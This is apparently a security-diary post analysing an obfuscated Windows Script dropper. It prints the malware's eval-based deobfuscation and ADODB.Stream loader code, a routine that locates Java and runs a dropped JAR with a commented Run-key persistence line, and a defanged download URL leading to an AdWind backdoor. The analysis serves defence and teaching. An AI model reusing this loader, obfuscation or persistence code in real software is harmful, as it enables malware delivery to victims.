If You Want Something Done Right, You Have To Do It Yourself... Malware Too!
I’m teaching FOR610[1] this week and today is dedicated to malicious web and document files. That’s a good opportunity to share with you a Windows Script that uses a nice obfuscation technique. The attacker's idea is to use a big array containing the second stage payload and interesting strings:
var Kerosene = [ function(){ var Odds = "m!FyIG5lbTQ0Ow0Km!FyIGxvb!mUZXh0ID0gIlVFc0RC ….”; return [function(){ eval("Odds = Odds.replace(new RegExp(\"!@@\", \"g\"), \"A\");"); eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x6D\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x64\x22\x29\x3B"); eval("\x4F\x64\x64\x73\x20\x3D\x20\x4F\x64\x64\x73\x2E\x72\x65\x70\x6C\x61\x63\x65\x28\x6E\x65\x77\x20\x52\x65\x67\x45\x78\x70\x28\x22\x21\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x6D\x22\x29\x3B"); return Odds; }][0](); }, Array("CreateObject","ReadText","undefined","\x61\x64\x6F\x64\x62\x2E","\x43\x68\x61\x72\x53\x65\x74","\x50\x6F\x73\x69\x74\x69\x6F\x6E","\x54\x79\x70\x65","Open","Write","nodeTypedValue"),null ];
Like JavaScript, Windows Script is a language very permissive regarding data types and you can mix functions and strings in the same array. The first element of the array Kerozene[] is a function that deobfuscates a very long string that is also polluted with character substitutions. Once replaced, these characters with the right one, you can decode the Base64 string and get the second payload. The other elements are in a second array with some hex-encoded elements Then the following code is executed:
Kerosene[3] = Array(WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D"), WSH[Kerosene[1][0]]("microsoft.xmldom").createElement("cfg"), {bmx: "\x75\x73\x2D\x61\x73\x63\x69\x69"}); Kerosene[4] = function(){return Kerosene[3][0];}; [function(){ Kerosene[3][1].dataType = "\x62\x69\x6E\x2E\x62\x61\x73\x65\x36\x34"; Kerosene[3][1].text = Kerosene[0](); [function(){ eval("Kerosene[4]()[Kerosene[1][6]] = 1;Kerosene[4]()[Kerosene[1][7]]();Kerosene[4]()[Kerosene[1][8]]. (Kerosene[3][1][Kerosene[1][9]]);"); eval("Kerosene[4]()[Kerosene[1][5]] = 0;Kerosene[4]()[Kerosene[1][6]] = 2;"); eval("Kerosene[4]()[Kerosene[1][4]] = Kerosene[3][2].bmx;"); eval("Kerosene = [Array(eval), Kerosene[4](), [Kerosene[1][1]]];"); }][0](); }][0](); Kerosene[0][0](Kerosene[1][Kerosene[2]]());
How does it work? References to elements of the array are replaced by their value during the execution. Example:
WSH[Kerosene[1][0]]("\x61\x64\x6F\x64\x62\x2E\x73\x74\x72\x65\x61\x6D")
becomes:
WSH[CreateOject("adodb.stream")
The second payload implements the same obfuscation technique (a Base64 payload is decoded after replacing some garbage characters). The script applies the principle of "help yourself". The interesting function is GrabJreFromNet() which tries to download a Java Runtime Environment if not already installed on the victim's computer. The package is grabbed from this URL: hxxp://ops[.]com[.]pa/jre7.zip
The script performs the following test to detect if Java is available or not:
var text = ""; try { text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion"); text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome"); } catch(err) {} try { if (text == "") { text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion"); text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome"); if (text != "") { text = text + "\\bin\\javaw.exe"; } } else { text = text + "\\bin\\javaw.exe"; } } catch(err) {} try { if (text != "") { //wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ"); wshShell.run ("\"" + text + "\" -jar \"" + stubpath + "\""); } else { GrabJreFromNet(); } } catch(err) {}
The third payload is a Zip file (a JAR file) that contains a classic AdWind backdoor (SHA256: 3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab)[2].
[1] http://for610.com
[2] https://www.virustotal.com/gui/file/3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab/detection
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Reverse-Engineering Malware: Advanced Code Analysis | Singapore | Nov 18th - Nov 22nd 2024 |
Comments
(from malware-baazar)
Anonymous
Jul 9th 2020
4 years ago